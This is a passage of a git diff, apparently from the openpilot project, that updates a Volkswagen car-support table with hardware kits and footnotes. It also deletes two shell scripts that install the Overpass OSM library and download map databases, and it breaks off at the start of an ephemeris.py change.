- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|e-Crafter 2018-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|31 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 angled mount (8 degrees)
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|e-Golf 2014-20|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Golf 2015-20|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Golf Alltrack 2015-19|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Golf GTD 2015-20|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Golf GTE 2015-20|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Golf GTI 2015-21|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Golf R 2015-19|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Golf SportsVan 2015-20|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Grand California 2019-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|31 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 angled mount (8 degrees)
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Jetta 2018-22|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Jetta GLI 2021-22|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Passat 2015-22[9](#footnotes)|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Passat Alltrack 2015-22|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Passat GTE 2015-22|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Polo 2018-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
[12](#footnotes)|| -|Volkswagen|Polo GTI 2018-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
[12](#footnotes)|| -|Volkswagen|T-Cross 2021|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
[12](#footnotes)|| -|Volkswagen|T-Roc 2021|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
[12](#footnotes)|| -|Volkswagen|Taos 2022-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Teramont 2018-22|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Teramont Cross Sport 2021-22|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Teramont X 2021-22|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Tiguan 2018-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Tiguan eHybrid 2021-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| -|Volkswagen|Touran 2016-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,11](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Arteon 2018-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Arteon eHybrid 2020-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Arteon R 2020-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Atlas 2018-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Atlas Cross Sport 2021-22|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|California 2021|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|31 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 angled mount (8 degrees)
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Caravelle 2020|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|31 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 angled mount (8 degrees)
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|CC 2018-22|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Crafter 2017-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|31 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 angled mount (8 degrees)
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|e-Crafter 2018-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|31 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 angled mount (8 degrees)
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|e-Golf 2014-20|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Golf 2015-20|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Golf Alltrack 2015-19|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Golf GTD 2015-20|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Golf GTE 2015-20|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Golf GTI 2015-21|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-empty.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Golf R 2015-19|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Golf SportsVan 2015-20|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Grand California 2019-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|31 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 angled mount (8 degrees)
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Jetta 2018-22|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Jetta GLI 2021-22|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Passat 2015-22[10](#footnotes)|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Passat Alltrack 2015-22|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Passat GTE 2015-22|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Polo 2018-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
[13](#footnotes)|| +|Volkswagen|Polo GTI 2018-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
[13](#footnotes)|| +|Volkswagen|T-Cross 2021|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
[13](#footnotes)|| +|Volkswagen|T-Roc 2021|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
[13](#footnotes)|| +|Volkswagen|Taos 2022-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Teramont 2018-22|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Teramont Cross Sport 2021-22|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Teramont X 2021-22|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Tiguan 2018-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Tiguan eHybrid 2021-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| +|Volkswagen|Touran 2016-23|Adaptive Cruise Control (ACC) & Lane Assist|openpilot available[1,12](#footnotes)|0 mph|0 mph|[![star](assets/icon-star-full.svg)](##)|[![star](assets/icon-star-full.svg)](##)|
View- 1 J533 connector
- 1 USB-C coupler
- 1 comma three
- 1 harness box
- 1 long OBD-C cable
- 1 mount
- 1 right angle OBD-C cable (1.5 ft)
Buy Here
|| ### Footnotes 1Experimental openpilot longitudinal control is available behind a toggle; the toggle is only available in non-release branches such as `devel` or `master-ci`.
@@ -269,12 +271,13 @@ A supported vehicle is one that just works when you install a comma three. All s 4Requires a community built ASCM harness. NOTE: disconnecting the ASCM disables Automatic Emergency Braking (AEB).
52019 Honda Civic 1.6L Diesel Sedan does not have ALC below 12mph.
6Requires a red panda for this CAN FD car. All the hardware needed is sold in the CAN FD kit.
-7openpilot operates above 28mph for Camry 4CYL L, 4CYL LE and 4CYL SE which don't have Full-Speed Range Dynamic Radar Cruise Control.
-8Not including the China market Kamiq, which is based on the (currently) unsupported PQ34 platform.
-9Refers only to the MQB-based European B8 Passat, not the NMS Passat in the USA/China/Mideast markets.
-10Some Škoda vehicles are equipped with heated windshields, which are known to block GPS signal needed for some comma three functionality.
-11Only available for vehicles using a gateway (J533) harness. At this time, vehicles using a camera harness are limited to using stock ACC.
-12Model-years 2022 and beyond may have a combined CAN gateway and BCM, which is supported by openpilot in software, but doesn't yet have a harness available from the comma store.
+7In the non-US market, openpilot requires the car to come equipped with EyeSight with Lane Keep Assistance.
+8openpilot operates above 28mph for Camry 4CYL L, 4CYL LE and 4CYL SE which don't have Full-Speed Range Dynamic Radar Cruise Control.
+9Not including the China market Kamiq, which is based on the (currently) unsupported PQ34 platform.
+10Refers only to the MQB-based European B8 Passat, not the NMS Passat in the USA/China/Mideast markets.
+11Some Škoda vehicles are equipped with heated windshields, which are known to block GPS signal needed for some comma three functionality.
+12Only available for vehicles using a gateway (J533) harness. At this time, vehicles using a camera harness are limited to using stock ACC.
+13Model-years 2022 and beyond may have a combined CAN gateway and BCM, which is supported by openpilot in software, but doesn't yet have a harness available from the comma store.
## Community Maintained Cars Although they're not upstream, the community has openpilot running on other makes and models. See the 'Community Supported Models' section of each make [on our wiki](https://wiki.comma.ai/). diff --git a/installer/custom/install_osm.sh b/installer/custom/install_osm.sh deleted file mode 100755 index f92e461ed..000000000 --- a/installer/custom/install_osm.sh +++ /dev/null @@ -1,39 +0,0 @@ -# OSM Installation instructions: -# https://wiki.openstreetmap.org/wiki/Overpass_API/Installation - -# Install expat. All other needed libraries are already installed. -# g++ make expat libexpat1-dev zlib1g-dev -#sudo apt-get update -#sudo apt-get install expat - -# Add required path variables to environment -export OSM_ROOT=/data/media/0/osm -if [ -f /TICI ]; then - export OSM_VERSION=0.7.57 -else - export OSM_VERSION=0.7.56 -fi -export GZ_FILE=osm-3s_v${OSM_VERSION}.tar.xz -export OSM_DIR=${OSM_ROOT}/${OSM_VERSION} -# export DB_DIR=/data/osm/db/ - -# Download and extract overpass library - -if [ ! -d ${OSM_ROOT} ]; then - mkdir -p ${OSM_ROOT} -fi -tar -vxf /data/openpilot/selfdrive/mapd/assets/${GZ_FILE} -C ${OSM_ROOT} - -# Configure and install overpass -#cd $(ls | grep $SOURCE_FILE_ROOT\.[0-9]*) -#cd osm-3s_v0.7.56 -#./configure CXXFLAGS="-O2" --prefix=$EXEC_DIR -#make install - -# Remove source files after installation -#cd .. -if [ -d ${OSM_DIR} ]; then - rm -fr ${OSM_DIR} -fi - -mv ${OSM_ROOT}/osm-3s_v${OSM_VERSION} ${OSM_ROOT}/v${OSM_VERSION} diff --git a/installer/custom/install_osm_db.sh b/installer/custom/install_osm_db.sh deleted file mode 100755 index ac8569d9e..000000000 --- a/installer/custom/install_osm_db.sh +++ /dev/null @@ -1,34 +0,0 @@ -export OSM_DIR=/data/media/0/osm - -export OSM_LOCATION=$(cat /data/params/d/OsmLocationUrl) - -export OSM_LOCATION_TEXT=$(cat /data/params/d/OsmLocationName) - -export XZ_MAP_FILE_NAME=${OSM_LOCATION_TEXT}.tar.xz -export XZ_MAP_FILE=${OSM_DIR}/${XZ_MAP_FILE_NAME} - -# WD -cd $OSM_DIR - -# Remove legacy compressed map file if existing -rm -rf $XZ_MAP_FILE - -# Download map file -wget -O ${XZ_MAP_FILE_NAME} ${OSM_LOCATION} - -if [[ "$?" != 0 ]]; then - echo "Error downloading map file" -else - echo "Successfully downloaded map file" - # Remove current db dir if existing - rm -rf ${DB_DIR}/db - if [ -d ${OSM_DIR}/${OSM_LOCATION_TEXT} ]; then - rm -rf ${OSM_DIR}/${OSM_LOCATION_TEXT} - fi - # Decompressing - tar -vxf ${XZ_MAP_FILE_NAME} - mv ${OSM_LOCATION_TEXT} db - - # Remove compressed map files after expanding - rm -rf $XZ_MAP_FILE -fi diff --git a/laika/ephemeris.py b/laika/ephemeris.py index 13da281df..fa8dbdf8d 100644 --- a/laika/ephemeris.py +++ b/laika/ephemeris.py @@ -11,7 +11,7 @@ from math import sin, cos, sqrt, fabs, atan2 from 